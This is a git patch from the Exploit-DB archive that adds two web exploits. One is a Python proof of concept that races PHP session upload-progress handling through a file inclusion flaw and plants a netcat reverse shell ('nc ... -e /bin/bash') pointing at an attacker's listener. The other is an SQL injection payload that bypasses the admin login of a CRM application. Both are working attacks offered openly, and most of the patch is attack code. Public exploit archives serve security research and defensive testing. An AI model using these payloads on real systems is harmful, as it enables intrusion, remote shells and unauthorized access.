From f648cfe79356c848a1aac5652b7952cdc7ba2d70 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Wed, 28 Jul 2021 05:01:54 +0000
Subject: [PATCH] DB: 2021-07-28

2 changes to exploits/shellcodes

PHP 7.3.15-3 - 'PHP_SESSION_UPLOAD_PROGRESS' Session Data Injection
Customer Relationship Management System (CRM) 1.0 - Sql Injection Authentication Bypass
---
 exploits/php/webapps/50156.py  | 66 ++++++++++++++++++++++++++++++++++
 exploits/php/webapps/50158.txt | 19 ++++++++++
 files_exploits.csv             |  2 ++
 3 files changed, 87 insertions(+)
 create mode 100755 exploits/php/webapps/50156.py
 create mode 100644 exploits/php/webapps/50158.txt

diff --git a/exploits/php/webapps/50156.py b/exploits/php/webapps/50156.py
new file mode 100755
index 000000000..65c8f2857
--- /dev/null
+++ b/exploits/php/webapps/50156.py
@@ -0,0 +1,66 @@
+# Exploit Title: PHP 7.3.15-3 - 'PHP_SESSION_UPLOAD_PROGRESS' Session Data Injection
+# Date: 26/7/2021
+# Exploit Author: SiLvER | Faisal Alhadlaq
+# Tested on: PHP Version is 7.3.15-3
+# This poc will abusing PHP_SESSION_UPLOAD_PROGRESS then will trigger race condition to get remote code execution, the script will return a reverse shell using netcat
+
+#!/usr/bin/python3
+"""
+Usage :
+
+python3 poc.p <Target URL> <ListnerIP> <ListnerPORT>
+python3 poc.py https://xyz.xyz 192.168.1.15 1337
+
+"""
+import requests
+import threading
+import datetime
+import sys
+
+x = datetime.datetime.now()
+addSeconds = datetime.timedelta(0, 10)
+newDatetime = x + addSeconds
+
+def fuzz():
+	targetIP = sys.argv[1]
+	listnerIP = sys.argv[2]
+	listnerPORT = sys.argv[3]
+	global newDatetime
+	while True:
+		try:
+			if datetime.datetime.now() > newDatetime:
+				exit()
+			# proxies = {
+			#     "http": "http://127.0.0.1:8080",
+			#    	"https": "https://127.0.0.1:8080",
+			#    	}
+			sessionName = "SiLvER"
+			url = targetIP
+			s = requests.Session()
+			cookies = {'PHPSESSID': sessionName}
+			files = {'PHP_SESSION_UPLOAD_PROGRESS': (None, '<?php `nc '+ listnerIP +' '+ listnerPORT + ' -e /bin/bash`;?>'), 'file': ('anyThinG', 'Abusing PHP_SESSION_UPLOAD_PROGRESS By Faisal Alhadlaq '*100, 'application/octet-stream')}
+			# You need to change the parameter in your case , here the vulnerabile parameter is (lfi)
+			params = (('lfi', '/var/lib/php/sessions/sess_'+sessionName),)
+			x = s.post(url, files=files, params=params, cookies=cookies, allow_redirects=False, verify=False)#, proxies=proxies
+		
+		except Exception as error:
+			print(error)
+			exit()
+def main():
+	print("\n(+) PoC for Abusing PHP_SESSION_UPLOAD_PROGRESS By SiLvER\n")
+	threads = []
+	for _ in range(20):
+		t = threading.Thread(target=fuzz)
+		t.start()
+		threads.append(t)
+	for thread in threads:
+		thread.join
+
+if __name__ == "__main__":
+    if len(sys.argv) < 4:
+        print("\n(-) Usage: {} <Target URL> <ListnerIP> <ListnerPORT>".format(sys.argv[0]))
+        print("(-) eg: {} https://xyz.xyz 192.168.1.15 1337 ".format(sys.argv[0]))
+        print("\n(=) By SiLvER \n")
+        exit()  
+    else:
+    	main()
\ No newline at end of file
diff --git a/exploits/php/webapps/50158.txt b/exploits/php/webapps/50158.txt
new file mode 100644
index 000000000..a895a6aaf
--- /dev/null
+++ b/exploits/php/webapps/50158.txt
@@ -0,0 +1,19 @@
+# Exploit Title: Customer Relationship Management System (CRM) 1.0 - Sql Injection Authentication Bypass
+# Date: 27/07/2021
+# Exploit Author: Shafique_Wasta
+# Vendor Homepage: https://www.sourcecodester.com/php/14794/customer-relationship-management-crm-system-php-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/crm_0.zip
+# Version: 1
+# Tested on: Windows 10/xampp
+
+# DESCRIPTION #
+
+# Customer relationship management system is vulnerable to Sql Injection Auth Bypass
+
+# Exploit Working:
+# 1. Visit on localhostcrm/customer/login.php
+# 2. You will see the login panel
+# 3. use this payload ( '=' 'or' ) in username and click on signin you will login into the admin account.
+
+# Vulnerable URL :http://localhost/crm/customer/login.php
+# Payload: '=' 'or'
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index aeb4ab57d..dbc3b19a3 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -44289,3 +44289,5 @@ id,file,description,date,author,type,platform,port
 50151,exploits/aspx/webapps/50151.py,"Microsoft SharePoint Server 2019 - Remote Code Execution (2)",2021-07-23,Podalirius,webapps,aspx,
 50154,exploits/windows/webapps/50154.py,"NoteBurner 2.35 - Denial Of Service (DoS) (PoC)",2021-07-26,stresser,webapps,windows,
 50155,exploits/php/webapps/50155.txt,"XOS Shop 1.0.9 - 'Multiple' Arbitrary File Deletion (Authenticated)",2021-07-26,faisalfs10x,webapps,php,
+50156,exploits/php/webapps/50156.py,"PHP 7.3.15-3 - 'PHP_SESSION_UPLOAD_PROGRESS' Session Data Injection",2021-07-27,"Faisal Alhadlaq",webapps,php,
+50158,exploits/php/webapps/50158.txt,"Customer Relationship Management System (CRM) 1.0 - Sql Injection Authentication Bypass",2021-07-27,Shafique_Wasta,webapps,php,